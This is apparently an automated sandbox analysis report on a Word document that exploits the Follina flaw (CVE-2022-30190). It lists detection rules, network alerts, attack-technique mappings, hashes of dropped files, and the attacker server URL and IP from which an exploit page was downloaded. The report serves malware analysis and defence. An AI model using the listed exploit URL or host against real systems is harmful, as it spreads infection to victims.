Windows
Analysis Report
ZDhoKQk8G6.docx
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- WINWORD.EXE (PID: 828 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Doc_WordXMLRels_May22 | Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard, Wojciech Cieslak |
| |
INDICATOR_OLE_RemoteTemplate | Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
Click to see the 3 entries |
Timestamp: | 117.48.146.246192.168.2.228008491782023942 06/15/22-07:10:36.033223 |
SID: | 2023942 |
Source Port: | 8008 |
Destination Port: | 49178 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 117.48.146.246192.168.2.228008491782036726 06/15/22-07:10:36.033223 |
SID: | 2036726 |
Source Port: | 8008 |
Destination Port: | 49178 |
Protocol: | TCP |
Classtype: | Attempted User Privilege Gain |
Timestamp: | 117.48.146.246192.168.2.228008491782023941 06/15/22-07:10:36.033223 |
SID: | 2023941 |
Source Port: | 8008 |
Destination Port: | 49178 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 117.48.146.246192.168.2.228008491812023941 06/15/22-07:10:38.181098 |
SID: | 2023941 |
Source Port: | 8008 |
Destination Port: | 49181 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 117.48.146.246192.168.2.228008491812023942 06/15/22-07:10:38.181098 |
SID: | 2023942 |
Source Port: | 8008 |
Destination Port: | 49181 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 117.48.146.246192.168.2.228008491812036726 06/15/22-07:10:38.181098 |
SID: | 2036726 |
Source Port: | 8008 |
Destination Port: | 49181 |
Protocol: | TCP |
Classtype: | Attempted User Privilege Gain |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Extracted files from sample: |
Source: | File opened: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
System Summary |
---|
Source: | Matched rule: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | LNK file: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Persistence and Installation Behavior |
---|
Source: | Extracted files from sample: |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 12 Exploitation for Client Execution | Path Interception | Path Interception | 1 Masquerading | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 11 Non-Standard Port | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 2 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 12 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 4 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
25% | Virustotal | Browse | ||
17% | ReversingLabs | Script-Macro.Exploit.CVE-2017-0199 |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
117.48.146.246 | unknown | China | 4837 | CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | true |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 645905 |
Start date and time: 15/06/202207:09:28 | 2022-06-15 07:09:28 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 20s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | ZDhoKQk8G6.docx |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 5 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal84.troj.expl.evad.winDOCX@1/22@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
- TCP Packets have been reduced to 100
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtSetValueKey calls found.
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2885388677374342 |
Encrypted: | false |
SSDEEP: | 48:I3oocnRBcAVFKPR2ais0luP2N2E9hrQZq46xbATxbA7H:Ko9LjKvP2N2E99Qt6x0Tx07H |
MD5: | C86FDD1688DFA14188A34E2FA613D252 |
SHA1: | EE12F352A8EB013ACD680EAF77177F590D8E1799 |
SHA-256: | 92FE284561709E189C7A95D753BFFDFE5EA788C48E0AFC642FF8ACF4E886EB17 |
SHA-512: | 5AD00B55C195FBA1AFB83648429FB964AF0E76DDB399BA47A3D4E8F56F6D7507A0B8C665C262C7A546093BB5AE31849744FFA2D6BF498CBF110979D82E3DCF65 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2A40B0AC-ACBB-463B-8DC0-568E01ED388D}.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.6757902642554773 |
Encrypted: | false |
SSDEEP: | 96:K46Cy3egKDtc1r5vztDz3IdoG9oU8MC+1T0HQYGS:z6WDe1rxhhGjm+uw |
MD5: | D97F2CC70A4379260D06D56554D15338 |
SHA1: | AA791DEB8BDE74815AD14F492E808E3BE2CA33DB |
SHA-256: | C16B2099208C3E92051AE581D68C48EACE6C2676FA3D0294C11CFFA4D1296B76 |
SHA-512: | BF551EBCA42DADD9EFA9D10EECAA907F2B8ABF67DD5F10AFCB5AF98FD226C19848A26AEF80E744592D45AD2A411075008964879CF33DC8E31B0796293BA8DB01 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.939953768708169 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlz8JllVXIlsSllILmnSBSYQJldOJ7lWldFk276:yPblzQwlsSHIKSBS9cJAlk22 |
MD5: | 23C72AAF923FE6C7EA713BC3B6BABE8D |
SHA1: | 81BE16213DBADA2C88789E63AB577C51035F3D02 |
SHA-256: | 8B119C83E768575DBDAB4CA4C43A5036600340D9D73CA253A000D4EE91651620 |
SHA-512: | 6177F0BDA0D261F5E566137684A750695E9E62B7AE514E1FA9C74E5C78A83BBE6B5DD975BEB907F56BF625C9AC8F1E531952C5EBF6B68E0169C0A64E4612AB75 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.28920165154806665 |
Encrypted: | false |
SSDEEP: | 48:I3NRBK1cjGmLVnNyw5T5iYlbxQ/rJmAS5REAS5RLH:KNLNJxQTJTotoLH |
MD5: | 5D8DC4451C809A7288A70F0310BAFB79 |
SHA1: | 9BB56FEF0EC78307F10DCE7E9C75C353A8312CC5 |
SHA-256: | 4A7FDAD115C3C0982E5200F719C349B7F6C95415B35FF7ED9B18A4DFD6CFA143 |
SHA-512: | DE9B179EDB9C7D520F1C0AD968B1BA6F29C483CFEBB91A826C66CA1CD78ACEE277756E0FB4B66490534EDBB81BEAFAF97A7FF8B132BABC9DD6AE4FB0A0AB6E27 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4FD4A456-B142-48A7-8A26-7CC29A810637}.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.22189153735687875 |
Encrypted: | false |
SSDEEP: | 48:I3mEMRUrB1alSOwjXq7mdS/BVDIW6fbfzIssfbr1q3oDq3ok:KmRRCftjsJqQs8bM |
MD5: | 7453904A6FC41F31B5CF58B64E84E111 |
SHA1: | 525EB1FFC638888B18CC1DF87D46B1B7B11E51C9 |
SHA-256: | 5E68DD6840E40B8DEC61403C1C786857E02A22A05C399B941B13CED14BFC3A4D |
SHA-512: | E8D8AFDF2243BDEDCDFBB45DE3FAA0999A870DF34776F34E4D12E4AAA00700FB8A747AA1A1949FA3955759150407B6C85304E888E70FF4364FD02BECC5BE551C |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.9660980668778723 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlzF6R+UOLNvIWnsZ3lMp0276:yPblzkUZIWrp022 |
MD5: | E435FF41580D4AF52534CED5213A06DE |
SHA1: | D9D9501DB59405B4BD62FECC2C67AF0DA7B80AFE |
SHA-256: | 8C91DC89D9CC105BB8B3BA9CA0A156FC559EAD5A5C8546D86D6F3BDFEB14ED1B |
SHA-512: | F7C65AB2F7331A78093B2E73B425F8253A97EE32E3CAF150F880F2FAEC7C06F8E1F3EADC74E13D7E6BAFD9FE54A70DFE4BBF89B5C7A4B518B8981F1EE3670233 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 5982 |
Entropy (8bit): | 4.758638141931997 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG |
MD5: | 7F4B47B5BE4DF743220DDA8F5595909A |
SHA1: | 5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54 |
SHA-256: | 2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7 |
SHA-512: | E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB |
Malicious: | true |
Yara Hits: |
|
Reputation: | low |
IE Cache URL: | http://117.48.146.246:8008/exploit.htm |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\exploit[1].htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5982 |
Entropy (8bit): | 4.758638141931997 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG |
MD5: | 7F4B47B5BE4DF743220DDA8F5595909A |
SHA1: | 5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54 |
SHA-256: | 2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7 |
SHA-512: | E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5982 |
Entropy (8bit): | 4.758638141931997 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG |
MD5: | 7F4B47B5BE4DF743220DDA8F5595909A |
SHA1: | 5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54 |
SHA-256: | 2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7 |
SHA-512: | E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB |
Malicious: | true |
Yara Hits: |
|
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5982 |
Entropy (8bit): | 4.758638141931997 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gN:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiG |
MD5: | 7F4B47B5BE4DF743220DDA8F5595909A |
SHA1: | 5B7E7EEA20DE3F9C89D7FF3CF21E256D0EE00E54 |
SHA-256: | 2CDD875B905065D9E35E323EB56F8F5B1DCA141BE94DA35F79DAF833D88728A7 |
SHA-512: | E09214CCA66CDA3B0A0120985B19B029C7DA40A560DB9D0E8C80EE2F0988E655A5C452F8A1553BD5A86918EC2C92FBE622AFDA82302277C18CA839DC4321A6CB |
Malicious: | true |
Yara Hits: |
|
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B14BFC0.png
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 251976 |
Entropy (8bit): | 7.994452839001206 |
Encrypted: | true |
SSDEEP: | 6144:Y0ai6s7Sg8tWib0g5m+yHcsgiFi5XGfJsZ9Or4:Y0b1w0llHcsgnXKazOr4 |
MD5: | DFC62C64626F11E01A29203C6BFAC296 |
SHA1: | E418EF6561DDC24CD62D47ED131713B922871363 |
SHA-256: | 2C71BFD99AD8A748954CC840174C3851386001F40312D2B8956019801357B2F1 |
SHA-512: | A9B568AA135D67F3E2DEEAFACB137EF3EDBC09095214EDF49810EA2736DF60FD3D10067BBE42126F60018C5C9284ABF08B1A1719EE06471F72B003E5BF58F437 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F20135FB.png
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 184356 |
Entropy (8bit): | 7.989908339576132 |
Encrypted: | false |
SSDEEP: | 3072:jUKT4LKebSEdyKTPq2ElM4wHU5YDv4QUYKoxkX0gg4HS+NcqGTtji1f+2Z+pyl3/:wzLKebS0hzqnM4wHguUYJxWvqD8P+slP |
MD5: | C02C455F5D77DF5AE8B9F638C8EF8854 |
SHA1: | F3F8C9A5C20DABDD1FE99D05197F6D11BA9484AF |
SHA-256: | 5E07AC7BFE2C65429ACDBD281C0E9B92F5A382E4FFF699741E8D085F7EAD17DE |
SHA-512: | 10FBE8D48F22E26250206B84F2C4D3220C8E8FDC622FD33576A796856CFAAA467F6D5F9DD87AFE9DE242FB8EEA27F6E13A743B8231F932FF494E88C710EC86F9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6144 |
Entropy (8bit): | 2.193154020020311 |
Encrypted: | false |
SSDEEP: | 24:rOheRLp07US2GRXhR1iUtbtE1sR1i72GRXhbhMi72GRXI:riD24X1iS51i724Vqi724 |
MD5: | 47DE66F0D409B5DCA1C5A74F93197E3B |
SHA1: | E2F2B6C4C25C531C9247509D900D09FAFFD7CCC3 |
SHA-256: | BDBF2FA4C228CB0038E3D3D5D63BE3D445C1CF19774AC7F7BAB5B31CD3DECDBD |
SHA-512: | 4755E1DBE64B77022440CFA730204DC9CDD7D34558CA98F428315A008E7B72498A55445BB1B4C8D5F24F2C19C6592EE09FA15DFD301A5CD3926C9D0F5387731C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0F1199C9-FFD7-4240-8F04-53D52631A074}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2 |
Entropy (8bit): | 1.0 |
Encrypted: | false |
SSDEEP: | 3:X:X |
MD5: | 32649384730B2D61C9E79D46DE589115 |
SHA1: | 053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4 |
SHA-256: | E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB |
SHA-512: | A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3D2E09D-939E-4CE8-8CEF-3005BD062461}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2828 |
Entropy (8bit): | 5.711486827536375 |
Encrypted: | false |
SSDEEP: | 48:I90P62VCDYx0Y59VYCG+stp0//PWZmVx77K5Y1VWMqDJQ/nbp0:ImlZz5nY+8IBEJQTp0 |
MD5: | 985DDD0B25EBF55AE27458B1235FCEC6 |
SHA1: | 5DB27EE086681CA58169ED02A82333A4CCC2466B |
SHA-256: | 678804E2C39F405A132A2CFC4DAC2A4855F10A98137C28CE6D3ABEACB2C7CB7B |
SHA-512: | 7668711CEBBD48C7E15905105477DB8D3EB292FCAEB7E15CDC3B689BE3DED9B83A3C420A66ED6BFBA860B51737985F08948D7D6837CC7CC27E2F210C09FC88FC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F2A88E0D-A9AE-4C78-97ED-928ECF332904}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.0255932170100285 |
Encrypted: | false |
SSDEEP: | 6:I3DPc1x60FvxggLRj6Aj0+lpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPkxbpPvg+1vYg3J/ |
MD5: | AB727153D355FCB89A4DD0F778DB5504 |
SHA1: | 88523811C7F9B235D6FE4B601E4C9DDB8070A72F |
